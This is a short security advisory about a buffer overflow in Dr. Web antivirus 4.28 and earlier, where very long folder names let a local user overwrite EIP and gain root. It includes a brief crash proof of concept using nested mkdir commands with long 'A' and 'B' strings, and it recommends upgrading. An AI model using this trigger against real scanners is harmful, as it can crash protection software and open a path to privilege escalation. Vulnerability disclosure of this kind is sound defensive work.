|
|
|
|
| |
| Dr. WEB is an antivirus scanner. The new generation (DrWeb32) includes programs for Windows 95/98/ME/2000/NT/XP, DOS/386, OS/2, Novell NetWare, Linux, FreeBSD 3.xx and 4.xx and Solaris x86. A vulnerability in Dr Web allows a user with access to the server to gain root privileges by overflowing a buffer in the program. |
| |
Credit:
Information was provided by David Fernandez Madrid
|
| |
Vulnerable versions:
* Dr Web Version 4.28 and below
Immune versions:
*Dr Web Version 4.29b and above
When a user with access to the system creates files with a very long name it causes the buffer overflow and writes over the EIP, thus granting the user the ability to execute arbitrary code with root privileges.
The program consists of a monitor and scanner. Only the scanner option was tested on the 4.28a version and it was found vulnerable.
Exploit:
Build a folder with a very long name:
set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB
mkdir /$a
mkdir /$a/$b
Or:
SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%B%
Depending on system.
When the Anti-virus tries to scan the folder it crashes.
Solution:
Download latest version from Dr Web: Newest Versions
|
|
|
|
|
